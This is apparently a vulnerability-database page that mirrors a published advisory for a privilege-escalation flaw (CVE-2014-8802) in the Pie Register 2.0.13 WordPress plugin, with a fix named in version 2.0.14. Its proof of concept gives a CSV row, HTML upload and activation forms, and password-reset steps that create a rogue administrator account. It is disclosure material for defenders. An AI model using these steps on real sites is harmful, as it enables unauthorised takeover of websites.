Vulners
Lucene search
WordPress Plugin Pie Register 2.0.13 - Privilege Escalation
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | Wordpress Pie Register Plugin 2.0.13 - Privilege Escalation Vulnerability | 17 Jan 201500:00 | – | zdt |
 | WordPress Plugin Pie Register Has Unspecified Vulnerability | 26 Jan 201500:00 | – | cnvd |
 | CVE-2014-8802 | 23 Jan 201515:00 | – | cve |
 | CVE-2014-8802 | 23 Jan 201515:00 | – | cvelist |
 | EUVD-2014-8632 | 7 Oct 202500:30 | – | euvd |
 | WordPress Plugin Pie Register 2.0.13 - Privilege Escalation | 16 Jan 201500:00 | – | exploitpack |
 | CVE-2014-8802 | 23 Jan 201515:59 | – | nvd |
 | WordPress Pie Register Plugin 2.0.13 - Privilege Escalation | 16 Jan 201500:00 | – | patchstack |
 | Deserialization of untrusted data | 23 Jan 201515:59 | – | prion |
 | Pie Register <= 2.0.13 - Privilege escalation | 17 Jan 201517:32 | – | wpvulndb |
10
# Exploit Title: Pie Register 2.0.13 Privilege escalation
# Date: 16-10-2014
# Software Link: https://wordpress.org/plugins/pie-register/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-8802
# Category: webapps
1. Description
Anyone can import CSV file. Pie Register will import users from this file.
File: pie-register\pie-register.php
add_action( 'init', array($this,'pie_main') );
function pie_main() {
// I skip unnecessary lines
if(isset($_FILES['csvfile']['name'])) {
$this->importUsers();
}
}
http://security.szurek.pl/pie-register-2013-privilege-escalation.html
2. Proof of Concept
Create CSV file based on given example:
"Username","Display name","E-mail","User Registered","First Name","Last Name","Nickname","Role"
"hack","Hacked","[email protected]","2010-10-10 20:00:00","Hacked","Hacked","Hacked","administrator"
Import account using:
<form method="post" action="http://wordpress-instalation" enctype="multipart/form-data">
Input CSV<input type="file" name="csvfile">
<input type="submit" value="Add user!">
</form>
Create another standard account using wp-login.php?action=register.
After login go to wp-admin/profile.php and search "uid" in page source.
Number after "uid" is our current account id. For example: "uid":"123".
We can assume that previously imported admin account has id-1 (or id-x where x is natural number).
We can activate this account using:
<form method="post" action="http://wordpress-instalation">
<input type="hidden" name="verifyit" value="1">
Account id:<input type="text" name="vusers[]" value="">
<input type="submit" value="Activate user!">
</form>
Finally we can reset password using: http://wordpress-instalation/wp-login.php?action=lostpassword
3. Solution:
Update to version 2.0.14
https://downloads.wordpress.org/plugin/pie-register.2.0.14.zipData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Jan 2015 00:00Current
6.8Medium risk
Vulners AI Score6.8
CVSS 25
EPSS0.07979